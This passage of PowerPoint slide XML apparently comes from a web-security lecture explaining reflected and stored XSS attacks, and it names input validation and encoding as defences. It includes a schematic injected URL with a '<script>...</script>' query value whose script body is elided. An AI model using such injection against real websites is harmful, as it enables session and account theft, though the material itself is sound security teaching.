                  <a:pt x="1527490" y="836687"/>
                  <a:pt x="1633356" y="855301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1739222" y="873915"/>
                  <a:pt x="1906164" y="861118"/>
                  <a:pt x="2073106" y="848321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" name="Vrije vorm 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3120225" y="2216625"/>
            <a:ext cx="3066176" cy="872279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" name="Right Arrow 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2016351" y="2992872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92FA9174-4253-1504-C109-C867C58A6A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3470662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178C5439-A684-F663-CC37-E836E8789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sz="2400" dirty="0"/>
              <a:t>Reflected XSS attack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AD209FA-553B-4711-4678-06D1D1883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800" y="1012681"/>
            <a:ext cx="7839360" cy="511632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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker crafts malicious URL containing JavaScript  </a:t>
            </a:r>
          </a:p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https://google.com/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search?q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&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and tempts victim to click on this link </a:t>
            </a:r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857161" lvl="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i="1" dirty="0"/>
              <a:t>Could careful web server prevent this?</a:t>
            </a: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dirty="0"/>
              <a:t>Yes, by validating &amp; rejecting and/or encoding content in query!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4C0BCB2-DB13-5A48-C869-BE502098B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F20F8C0-4565-4E2B-97F6-1AF2C0B2EF1D}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>90</a:t>
            </a:fld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63494" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{664F7F52-A80B-C518-B945-C26E8DFF4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31" y="2941554"/>
            <a:ext cx="1487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1.malicious</a:t>
            </a:r>
          </a:p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URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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ight Arrow 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D993AE-0C5F-D60A-364D-75FC9F00B4FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2240217" y="3272874"/>
            <a:ext cx="1038240" cy="349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pic>
        <p:nvPicPr>
          <p:cNvPr id="63497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ABAB7D43-D4C2-A818-1582-5720A14B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923624"/>
            <a:ext cx="699372" cy="120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28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87878B6B-09F5-AB6C-5E30-24BFAFFF79A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20491463" flipH="1">
            <a:off x="3364856" y="3958314"/>
            <a:ext cx="2882879" cy="4593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Arrow Connector 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9FD9F3-5D5A-2817-6D81-B0FE5F57DC6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4117976" y="3966954"/>
            <a:ext cx="1320480" cy="46080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00" name="Picture 2" descr="C:\Users\erikpoll\Desktop\.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B373F0-5758-9DB3-0284-C676DDF3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59" y="2184234"/>
            <a:ext cx="641090" cy="6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40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{363634AB-E712-4BB1-5580-536F0A294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27" y="4433738"/>
            <a:ext cx="353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HTML response containing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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&lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1577845-AB82-B936-3A81-D47B4976956D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20532090">
            <a:off x="3485816" y="3540714"/>
            <a:ext cx="2712960" cy="326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367F0F26-CF20-0356-C7D2-94709264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815" y="3101897"/>
            <a:ext cx="26294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HTTP request with </a:t>
            </a:r>
          </a:p>
          <a:p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malicious link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F55A5-2A52-C333-55D0-797CC679267B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2072143" y="4069302"/>
            <a:ext cx="1235998" cy="1113551"/>
            <a:chOff x="1584097" y="5327820"/>
            <a:chExt cx="1460196" cy="1227614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Afgeronde rechthoek 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB4FB502-4396-B658-A631-FEB431325916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1227614"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4817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victim’s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</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Afgeronde rechthoek 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{389AB5A7-B41B-F7D5-BC77-01903EE28E34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27292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614096AF-5BCA-9D88-EA1E-44295BF6CC25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6448345" y="2805131"/>
            <a:ext cx="1324524" cy="1113552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177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0F15095-180C-FB43-9F6A-ABB99C9033BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6441821" y="2983935"/>
            <a:ext cx="1135129" cy="755943"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 20782 w 1251401"/>
              <a:gd name="connsiteY0" fmla="*/ 257806 h 833375"/>
              <a:gd name="connsiteX1" fmla="*/ 180109 w 1251401"/>
              <a:gd name="connsiteY1" fmla="*/ 181606 h 833375"/>
              <a:gd name="connsiteX2" fmla="*/ 311727 w 1251401"/>
              <a:gd name="connsiteY2" fmla="*/ 105406 h 833375"/>
              <a:gd name="connsiteX3" fmla="*/ 311727 w 1251401"/>
              <a:gd name="connsiteY3" fmla="*/ 8424 h 833375"/>
              <a:gd name="connsiteX4" fmla="*/ 519545 w 1251401"/>
              <a:gd name="connsiteY4" fmla="*/ 22279 h 833375"/>
              <a:gd name="connsiteX5" fmla="*/ 526473 w 1251401"/>
              <a:gd name="connsiteY5" fmla="*/ 160824 h 833375"/>
              <a:gd name="connsiteX6" fmla="*/ 297873 w 1251401"/>
              <a:gd name="connsiteY6" fmla="*/ 285515 h 833375"/>
              <a:gd name="connsiteX7" fmla="*/ 678873 w 1251401"/>
              <a:gd name="connsiteY7" fmla="*/ 250879 h 833375"/>
              <a:gd name="connsiteX8" fmla="*/ 817418 w 1251401"/>
              <a:gd name="connsiteY8" fmla="*/ 98479 h 833375"/>
              <a:gd name="connsiteX9" fmla="*/ 949036 w 1251401"/>
              <a:gd name="connsiteY9" fmla="*/ 167752 h 833375"/>
              <a:gd name="connsiteX10" fmla="*/ 1108364 w 1251401"/>
              <a:gd name="connsiteY10" fmla="*/ 347861 h 833375"/>
              <a:gd name="connsiteX11" fmla="*/ 1246909 w 1251401"/>
              <a:gd name="connsiteY11" fmla="*/ 735788 h 833375"/>
              <a:gd name="connsiteX12" fmla="*/ 935182 w 1251401"/>
              <a:gd name="connsiteY12" fmla="*/ 832770 h 833375"/>
              <a:gd name="connsiteX13" fmla="*/ 658091 w 1251401"/>
              <a:gd name="connsiteY13" fmla="*/ 708079 h 833375"/>
              <a:gd name="connsiteX14" fmla="*/ 311727 w 1251401"/>
              <a:gd name="connsiteY14" fmla="*/ 749643 h 833375"/>
              <a:gd name="connsiteX15" fmla="*/ 0 w 1251401"/>
              <a:gd name="connsiteY15" fmla="*/ 784279 h 8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1401" h="833375">
                <a:moveTo>
                  <a:pt x="20782" y="257806"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="76200" y="232406"/>
                  <a:pt x="131618" y="207006"/>
                  <a:pt x="180109" y="181606"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228600" y="156206"/>
                  <a:pt x="289791" y="134270"/>
                  <a:pt x="311727" y="105406"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="333663" y="76542"/>
                  <a:pt x="277091" y="22278"/>
                  <a:pt x="311727" y="8424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346363" y="-5430"/>
                  <a:pt x="483754" y="-3121"/>
                  <a:pt x="519545" y="22279"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="555336" y="47679"/>
                  <a:pt x="563418" y="116951"/>
                  <a:pt x="526473" y="160824"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="489528" y="204697"/>
                  <a:pt x="272473" y="270506"/>
                  <a:pt x="297873" y="285515"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="323273" y="300524"/>
                  <a:pt x="592282" y="282052"/>
                  <a:pt x="678873" y="250879"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="765464" y="219706"/>
                  <a:pt x="772391" y="112333"/>
                  <a:pt x="817418" y="98479"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="862445" y="84624"/>
                  <a:pt x="900545" y="126188"/>
                  <a:pt x="949036" y="167752"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="997527" y="209316"/>
                  <a:pt x="1058719" y="253189"/>
                  <a:pt x="1108364" y="347861"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1158009" y="442533"/>
                  <a:pt x="1275773" y="654970"/>
                  <a:pt x="1246909" y="735788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218045" y="816606"/>
                  <a:pt x="1033318" y="837388"/>
                  <a:pt x="935182" y="832770"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="837046" y="828152"/>
                  <a:pt x="762000" y="721934"/>
                  <a:pt x="658091" y="708079"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="554182" y="694225"/>
                  <a:pt x="421409" y="736943"/>
                  <a:pt x="311727" y="749643"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="7842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8" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="0" animBg="1"/>
      <p:bldP spid="63501" grpId="0"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="2" grpId="0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E80CA7E6-1669-03ED-8F01-D83B8B79231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2000" y="1047240"/>
            <a:ext cx="8064455" cy="52011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GB" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker injects HTML into a web site, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> forum posting in Brightspace,          which is stored and echoed back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>later </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> when victim visit the same site</a:t>
            </a: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400" i="1" dirty="0"/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2100" i="1" dirty="0"/>
              <a:t>Could careful web server prevent this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457111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2100" dirty="0"/>
              <a:t>Yes, by rejecting and/or encoding content when it is stored or retrieved</a:t>
            </a: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 marL="0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sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033CC"/>
              </a:solidFill>
            </a:endParaRPr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dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457153" indent="-457153"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1800" dirty="0"/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US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457153" indent="-457153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endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Afgeronde rechthoek 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38481AE5-349C-BDD7-3E43-D5B54DE8090F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4360270" y="2793540"/>
            <a:ext cx="1204678" cy="1081152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13" name="Flowchart: Magnetic Disk 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D6D22D-9541-F575-601A-2E9F9F6CED69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6839061" y="2764201"/>
            <a:ext cx="1071699" cy="1036248"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8CD2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base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010" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A66C08-C412-919E-43C8-12577440D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sz="2400" dirty="0"/>
              <a:t>Stored XSS attack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18D98FBF-B96A-438E-4D92-B6CC6DC64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BE6498E-D5AA-4C35-A6B9-25EBE91C6530}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>91</a:t>
            </a:fld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854AC6EC-0E2C-080E-F224-414348F7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814" y="2362511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input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stored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3A29257-7519-17A2-E26A-BA5BDA4B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043" y="3110557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HTTP request</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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95FA24C1-4B15-9F55-2F11-DCD32908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928" y="3703423"/>
            <a:ext cx="2160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4.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content </a:t>
            </a:r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retrieved</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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E261B-9C7B-9A03-00F4-B2259849B124}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1568738" y="3986123"/>
            <a:ext cx="1235998" cy="1113551"/>
            <a:chOff x="1584097" y="5327820"/>
            <a:chExt cx="1460196" cy="1227614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Afgeronde rechthoek 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27BDA179-2BE9-0315-D509-54D70CC657FE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1227614"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4817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victim’s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</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Afgeronde rechthoek 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A137EB7-14E0-044B-0168-B40F9CE47AD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1584097" y="5327820"/>
              <a:ext cx="1460196" cy="27292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054C5-D333-1240-74A8-8CF72917C37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4355136" y="2938502"/>
            <a:ext cx="3310145" cy="830997"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3179804"/>
              <a:gd name="connsiteY0" fmla="*/ 83671 h 908100"/>
              <a:gd name="connsiteX1" fmla="*/ 166255 w 3179804"/>
              <a:gd name="connsiteY1" fmla="*/ 90599 h 908100"/>
              <a:gd name="connsiteX2" fmla="*/ 304800 w 3179804"/>
              <a:gd name="connsiteY2" fmla="*/ 544 h 908100"/>
              <a:gd name="connsiteX3" fmla="*/ 443345 w 3179804"/>
              <a:gd name="connsiteY3" fmla="*/ 139090 h 908100"/>
              <a:gd name="connsiteX4" fmla="*/ 554182 w 3179804"/>
              <a:gd name="connsiteY4" fmla="*/ 277635 h 908100"/>
              <a:gd name="connsiteX5" fmla="*/ 768927 w 3179804"/>
              <a:gd name="connsiteY5" fmla="*/ 159871 h 908100"/>
              <a:gd name="connsiteX6" fmla="*/ 803564 w 3179804"/>
              <a:gd name="connsiteY6" fmla="*/ 14399 h 908100"/>
              <a:gd name="connsiteX7" fmla="*/ 1267691 w 3179804"/>
              <a:gd name="connsiteY7" fmla="*/ 152944 h 908100"/>
              <a:gd name="connsiteX8" fmla="*/ 1357745 w 3179804"/>
              <a:gd name="connsiteY8" fmla="*/ 180653 h 908100"/>
              <a:gd name="connsiteX9" fmla="*/ 2098964 w 3179804"/>
              <a:gd name="connsiteY9" fmla="*/ 229144 h 908100"/>
              <a:gd name="connsiteX10" fmla="*/ 2417618 w 3179804"/>
              <a:gd name="connsiteY10" fmla="*/ 277635 h 908100"/>
              <a:gd name="connsiteX11" fmla="*/ 2493818 w 3179804"/>
              <a:gd name="connsiteY11" fmla="*/ 409253 h 908100"/>
              <a:gd name="connsiteX12" fmla="*/ 2618509 w 3179804"/>
              <a:gd name="connsiteY12" fmla="*/ 513162 h 908100"/>
              <a:gd name="connsiteX13" fmla="*/ 2874818 w 3179804"/>
              <a:gd name="connsiteY13" fmla="*/ 520090 h 908100"/>
              <a:gd name="connsiteX14" fmla="*/ 3172691 w 3179804"/>
              <a:gd name="connsiteY14" fmla="*/ 561653 h 908100"/>
              <a:gd name="connsiteX15" fmla="*/ 3068782 w 3179804"/>
              <a:gd name="connsiteY15" fmla="*/ 811035 h 908100"/>
              <a:gd name="connsiteX16" fmla="*/ 2867891 w 3179804"/>
              <a:gd name="connsiteY16" fmla="*/ 873381 h 908100"/>
              <a:gd name="connsiteX17" fmla="*/ 2604655 w 3179804"/>
              <a:gd name="connsiteY17" fmla="*/ 838744 h 908100"/>
              <a:gd name="connsiteX18" fmla="*/ 2403764 w 3179804"/>
              <a:gd name="connsiteY18" fmla="*/ 748690 h 908100"/>
              <a:gd name="connsiteX19" fmla="*/ 2140527 w 3179804"/>
              <a:gd name="connsiteY19" fmla="*/ 727908 h 908100"/>
              <a:gd name="connsiteX20" fmla="*/ 1835727 w 3179804"/>
              <a:gd name="connsiteY20" fmla="*/ 727908 h 908100"/>
              <a:gd name="connsiteX21" fmla="*/ 1669473 w 3179804"/>
              <a:gd name="connsiteY21" fmla="*/ 734835 h 908100"/>
              <a:gd name="connsiteX22" fmla="*/ 1357745 w 3179804"/>
              <a:gd name="connsiteY22" fmla="*/ 734835 h 908100"/>
              <a:gd name="connsiteX23" fmla="*/ 1094509 w 3179804"/>
              <a:gd name="connsiteY23" fmla="*/ 603217 h 908100"/>
              <a:gd name="connsiteX24" fmla="*/ 928255 w 3179804"/>
              <a:gd name="connsiteY24" fmla="*/ 672490 h 908100"/>
              <a:gd name="connsiteX25" fmla="*/ 824345 w 3179804"/>
              <a:gd name="connsiteY25" fmla="*/ 908017 h 908100"/>
              <a:gd name="connsiteX26" fmla="*/ 526473 w 3179804"/>
              <a:gd name="connsiteY26" fmla="*/ 700199 h 908100"/>
              <a:gd name="connsiteX27" fmla="*/ 20782 w 3179804"/>
              <a:gd name="connsiteY27" fmla="*/ 762544 h 9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79804" h="908100">
                <a:moveTo>
                  <a:pt x="0" y="83671"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="57727" y="94062"/>
                  <a:pt x="115455" y="104453"/>
                  <a:pt x="166255" y="90599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="217055" y="76745"/>
                  <a:pt x="258618" y="-7538"/>
                  <a:pt x="304800" y="544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="350982" y="8626"/>
                  <a:pt x="401781" y="92908"/>
                  <a:pt x="443345" y="139090"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="484909" y="185272"/>
                  <a:pt x="499918" y="274172"/>
                  <a:pt x="554182" y="277635"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="608446" y="281099"/>
                  <a:pt x="727363" y="203744"/>
                  <a:pt x="768927" y="159871"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="810491" y="115998"/>
                  <a:pt x="720437" y="15553"/>
                  <a:pt x="803564" y="14399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="886691" y="13244"/>
                  <a:pt x="1267691" y="152944"/>
                  <a:pt x="1267691" y="152944"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1357745" y="180653"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1496291" y="193353"/>
                  <a:pt x="1922319" y="212980"/>
                  <a:pt x="2098964" y="229144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2275609" y="245308"/>
                  <a:pt x="2351809" y="247617"/>
                  <a:pt x="2417618" y="277635"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2483427" y="307653"/>
                  <a:pt x="2460336" y="369999"/>
                  <a:pt x="2493818" y="409253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2527300" y="448507"/>
                  <a:pt x="2555009" y="494689"/>
                  <a:pt x="2618509" y="513162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2682009" y="531635"/>
                  <a:pt x="2782454" y="512008"/>
                  <a:pt x="2874818" y="520090"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2967182" y="528172"/>
                  <a:pt x="3140364" y="513162"/>
                  <a:pt x="3172691" y="561653"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3205018" y="610144"/>
                  <a:pt x="3119582" y="759080"/>
                  <a:pt x="3068782" y="811035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3017982" y="862990"/>
                  <a:pt x="2945245" y="868763"/>
                  <a:pt x="2867891" y="873381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2790537" y="877999"/>
                  <a:pt x="2682009" y="859526"/>
                  <a:pt x="2604655" y="838744"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2527301" y="817962"/>
                  <a:pt x="2481119" y="767163"/>
                  <a:pt x="2403764" y="748690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2326409" y="730217"/>
                  <a:pt x="2235200" y="731372"/>
                  <a:pt x="2140527" y="727908"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2045854" y="724444"/>
                  <a:pt x="1914236" y="726754"/>
                  <a:pt x="1835727" y="727908"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1757218" y="729062"/>
                  <a:pt x="1749137" y="733681"/>
                  <a:pt x="1669473" y="734835"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1589809" y="735990"/>
                  <a:pt x="1453572" y="756771"/>
                  <a:pt x="1357745" y="734835"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1261918" y="712899"/>
                  <a:pt x="1166091" y="613608"/>
                  <a:pt x="1094509" y="603217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1022927" y="592826"/>
                  <a:pt x="973282" y="621690"/>
                  <a:pt x="928255" y="672490"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="883228" y="723290"/>
                  <a:pt x="891309" y="903399"/>
                  <a:pt x="824345" y="908017"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="757381" y="912635"/>
                  <a:pt x="660400" y="724444"/>
                  <a:pt x="526473" y="700199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="392546" y="675954"/>
                  <a:pt x="206664" y="719249"/>
                  <a:pt x="20782" y="762544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>
              <a:latin typeface="Comic Sans MS" pitchFamily="64" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65543" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C62405-C217-3052-4221-B682D590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614" y="1912088"/>
            <a:ext cx="160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malicious input  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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ight Arrow 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11F37F59-75AB-7F3E-8B8F-EE06B70E7925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1560000">
            <a:off x="3135284" y="2507675"/>
            <a:ext cx="1136160" cy="328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pic>
        <p:nvPicPr>
          <p:cNvPr id="65554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D724719F-6202-7AF8-96E5-40F3FE6E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164" y="3894193"/>
            <a:ext cx="714444" cy="12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28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F91D683F-BBFD-911B-DD41-19E86EB6B725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20040000" flipH="1">
            <a:off x="2822804" y="3735994"/>
            <a:ext cx="1548000" cy="352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20" name="Straight Arrow Connector 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
